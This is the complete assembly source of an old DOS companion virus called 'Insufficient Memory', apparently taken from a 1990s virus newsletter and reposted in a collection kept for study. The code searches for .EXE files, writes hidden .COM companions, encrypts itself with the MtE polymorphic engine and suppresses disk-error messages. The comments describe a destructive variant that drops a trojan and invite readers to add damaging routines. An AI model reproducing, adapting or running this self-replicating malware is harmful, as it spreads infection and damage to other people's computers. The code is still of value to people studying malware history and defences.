insuff.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6
;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which 
;confines itself to the current directory. To assemble with TASM 2.5, user
;must have complete MTE091B software package (including RND.OBJ,
;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this
;issue of the Crypt Newsletter to assemble all proper
;components. Observant readers will notice INSUFF MEMO takes advantage of
;VCL 1.0 code as well as notation from the SARA virus.  INSUFF MEMO is
;a non-threatening, unique example of an MtE-loaded companion virus -
;the only one in circulation, in fact.
;
;INSUFF2, included as a DEBUG script in this newsletter, is functionally        
;identical to this virus.  However, for those who 'require' a destructive
;program for their full enjoyment, it is loaded with a routine which
;simple checks the system time and branches to some 'dropper' code if
;after quitting time (4:00 pm).  The 'dropper' reads from a data table
;and writes the NOIZ trojan to any .EXE in the current directory. By
;looking carefully at this code, several areas where 'potentially'
;destructive/nuisance routines can be added will suggest themselves.
;We do not include them for a number of reasons: 1) they are easy to
;come by in any number of books on assembly coding, the VCL 1.0 (an
;excellent source), or source code archives on mnay BBS's, and; 2)
;it allows you to get creative if you want and tinker (like I do all the
; time) with the basic layout of virus source.
;        
;INSUFF3's source listing is modified to allow the virus to jump out        
;of the current directory when all files in it are infected.  The
;listing is publicly available at the BBS's listed at the end of the
;Crypt newsletter.

	.model  tiny
	.radix  16
	.code

	extrn   mut_engine: near
	extrn   rnd_buf: word, data_top: near

	org     100

start:
	call    locadr

reladr: 
	db      'Insufficient memory'
	
locadr:
	pop     dx
	mov     cl,4
	shr     dx,cl
	sub     dx,10
	mov     cx,ds
	add     cx,dx                   ;Calculate new CS
	mov     dx,offset begin
	push    cx dx
	retf
begin:
	cld
	mov     di,offset start
	push    es di                   ;
	push    cs                      ;A carry over from the DAV
	pop     ds                      ;SARA virus, something of a curiosity
					;in this companion virus
	mov     dx,offset dta_buf       ;Set DTA
	mov     ah,1a
	int     21
	mov     ax,3524                 ;Hook INT 24, error handler
	int     21                      ;see bottom of code
	push    es bx
	mov     dx,offset fail_err
	mov     ax,2524
	int     21

        xor     ax,ax                   ;Initialize random seed for MtE
	mov     [rnd_buf],ax            ;could be coded, mov  cs:[rnd_buf],0
	push    sp                      ;process necessary for generation of
	pop     cx                      ;MtE encryption key - see MtE docs
	sub     cx,sp                   ;for further notation
	add     cx,4
	push    cx
	mov     dx,offset srchnam   ;EXE file-mask for spawn-name search
	mov     cl,3
	mov     ah,4e               ; DOS find first file function
       
find_a_file:    
       int     021h
       jc      infection_done          ; Exit if no files found
       jmp     infect                  ; Infect the file!
       jnc     infection_done          ; Exit if no error
findr: mov     ah,04Fh                 ; DOS find next file function
       jmp     find_a_file             ; Try finding another file

	
infection_done: 
     
	mov     ax,4C00h                ;terminate
	int     21h

infect:
	mov     ah,02Fh                 ; DOS get DTA address function
	int     021h
	mov     di,bx                   ; DI points to the DTA

	lea     si,[di + 01Eh]          ; SI points to file name
	mov     dx,si                   ; DX points to file name, too
	mov     di,offset spawn_name + 1; DI points to new name
	xor     ah,ah                   ; AH holds character count
transfer_loop:  
	lodsb                           ; Load a character
	or      al,al                   ; Is it a NULL?
	je      transfer_end            ; If so then leave the loop
	inc     ah                      ; Add one to the character count
	stosb                           ; Save the byte in the buffer
	jmp     short transfer_loop     ; Repeat the loop
transfer_end:   
	mov     byte ptr [spawn_name],ah; First byte holds char. count
	mov     byte ptr [di],13        ; Make CR the final character
	mov     di,dx                   ; DI points to file name
	xor     ch,ch                   ;
	mov     cl,ah                   ; CX holds length of filename
	mov     al,'.'                  ; AL holds char. to search for
repne   scasb                           ; Search for a dot in the name
	mov     word ptr [di],'OC'      ; Store "CO" as first two bytes
	mov     byte ptr [di + 2],'M'   ; Store "M" to make "COM"

	mov     byte ptr [set_carry],0  ; Assume we'll fail
	mov     ax,03D00h               ; DOS open file function, r/o
	int     021h
	jnc     findr                   ; File already exists, so leave
	mov     byte ptr [set_carry],1  ; Success -- the file is OK
	mov     ah,03Ch                 ; DOS create file function
	mov     cx,00100111b            ; CX holds file attributes (all)
	int     21h
	xchg    bx,ax                   ; BX holds file handle
	push    dx cx
	mov     ax,offset data_top+0Fh
	mov     cl,4
	shr     ax,cl
	mov     cx,cs
	add     ax,cx
	mov     es,ax
	mov     dx,offset start   ; DX points to start of virus
	mov     cx,offset _DATA   ; CX holds virus length for encryption 
	push    bp bx
	mov     bp,0100h  ;tells MtE decryption routine will
	xor     si,si     ;hand over control to where virus adds 
	xor     di,di     ;itself to 'infected' file, in this case offset  
	mov     bl,0Fh    ;0100h .. set si/di to 0, bl to 0Fh, all required 
	mov     ax,101    ;set bit-field in ax 
	call    mut_engine   ;call the Mutation Engine to do its thing
	pop     bx ax
	add     ax,cx
	neg     ax
	xor     ah,ah
	add     ax,cx
	mov     ah,040h          ;write encrypted virus to newly created file 
	int     21h
	mov     ah,03Eh          ;close the file 
	int     21h
	cmp     byte ptr [set_carry],1    
	jmp     infection_done            ;move to end game

		

fail_err:                      ;Critical error handler
	mov     al,3           ;prevents virus from producing
	iret                   ;messages on write-protected disks.
			       ;Not handed back to machine when virus exits.
srchnam db      '*.EXE',0      ;File-mask for 'spawn-search.'



	.data

dta_buf         db      2bh dup(?)              ; Buffer for DTA
spawn_name      db      12,12 dup (?),13        ; Name for next spawn
set_carry       db      ?                       ; Set-carry-on-exit flag
	
	end     start